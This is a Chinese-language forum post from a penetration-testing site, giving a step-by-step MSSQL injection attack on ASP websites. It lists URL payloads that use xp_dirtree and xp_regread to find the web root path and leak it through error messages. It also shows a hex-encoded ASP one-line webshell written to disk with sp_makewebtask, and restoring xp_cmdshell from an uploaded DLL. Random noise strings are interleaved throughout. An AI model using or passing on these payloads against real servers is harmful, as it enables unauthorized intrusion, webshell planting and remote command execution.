中国网络渗透测试联盟
标题:
MSsqlL注入取得网站路径最好的方法
[打印本页]
作者:
admin
时间:
2012-9-13 17:20
标题:
MSsqlL注入取得网站路径最好的方法
好,我们exec master..xp_dirtree'd:/test'
5 K& M; P$ V& g, K9 l0 [7 h
假设我们在test里有两个文件夹test1和test2在test1里又有test3
* {; X& R( M3 t
结果显示
( s& g! t- a$ v( Q& _
9 K- g2 _0 Q0 p; L$ i
subdirectory depth
& k& S# P( k, I
test1 1
# {# s C: A- b
test3 2
. F# {% D% W; a3 K
test2 1
" l& ~5 F I- f, O; Q
0 S% b0 ?7 x& L: g
哈哈发现没有那个depth就是目录的级数
. Z" ]! M/ t( _3 `5 k8 J
ok了,知道怎么办了吧
. ~8 Z( z) j' m" n5 L
\6 m n- W% |: L+ o
http://www.xxxxx.com/down/list.asp?id=1;create
table dirs(paths varchar(1000),id int)--
2 i% ]9 |, B7 Q B$ x! \: _
http://www.xxxxx.com/down/list.asp?id=1;insert
dirs exec master.dbo.xp_dirtree 'd:\' --
# G$ a3 H$ {9 D4 E
http://www.xxxxx.com/down/list.asp?id=1
and 0<>(select top 1 paths from dirs where id=1)-
* y- f/ R V9 \7 I5 u! Y/ C5 q5 K
( g4 Y V8 R; u3 w. s3 R5 |
只要加上id=1,就是第一级目录 。
. L/ B' O* b) n1 \8 u4 q: k5 g8 @
* u/ a1 |) S$ D) e* y
( E' `" }- z0 [
通过注册表读网站路径:
. T: e/ j7 B+ \
$ d2 [( i- U* [ {( K
1.;create table [dbo].[cyfd] ([gyfd][char](255));
5 ?' ^/ T2 M" u1 @/ W: [9 {
. r7 l8 H% P3 ~* Z( z
2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--
1 f7 @ h0 g. e( t( [, j; ~' b. Y) E: x! t
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--
7 k$ x: j- @ S
! C2 x+ i2 l6 K2 M/ ~# \
3.and 1=(select count(*) from 临时表 where 临时字段名>1)
) f& Q# ]/ B! ^. i' w ~
and 1=(select count(*) from cyfd where gyfd > 1)
- T$ P! n, `$ K+ ^0 c
这样IE报错,就把刚才插进去的Web路径的值报出来了
6 ~+ Z, ^& S( G) W0 ~) C2 Z
# l, \- Q( I7 p X
4.drop table cyfd;-- 删除临时表
# b! q8 _' a1 j X
) S- \, [7 X$ q, I% j' X
获得webshell方法:
V- c) q% Y8 j- @2 K% r5 U3 A/ U
1.create table cmd (a image)-- \**cmd是创建的临时表
& g' w M3 U; B8 x
& |0 @7 ~) u1 v( J; f+ T
2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
/ @$ A9 h% C6 ?% @5 o# V1 M
: |% Y* @9 F- {! d4 S! X f
; S) P! l/ E9 h: \& F, a1 W
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'
$ B1 N( a; V! w6 @( D/ y! c
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
/ Q0 S4 @' e, o' p' Z U
* G) n+ ], H9 C) x7 |. K
4.drop table cmd;-- 删除cmd临时表
+ {/ c& E$ N! W2 J0 ?0 p: o
! O" N6 S8 H6 k+ |
恢复xp_cmdshell方法之一:
3 H& R# n9 X( M( s! }* u# y4 ^3 h3 A
我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:
. h2 G- Z" e3 {9 n
http://www.something.com/script.asp?id=2;EXEC
master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'
* B6 K$ j0 U1 L0 d+ p, h v
恢复,支持绝对路径的恢复哦。:)
7 @3 l9 Z3 j. F8 B m
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2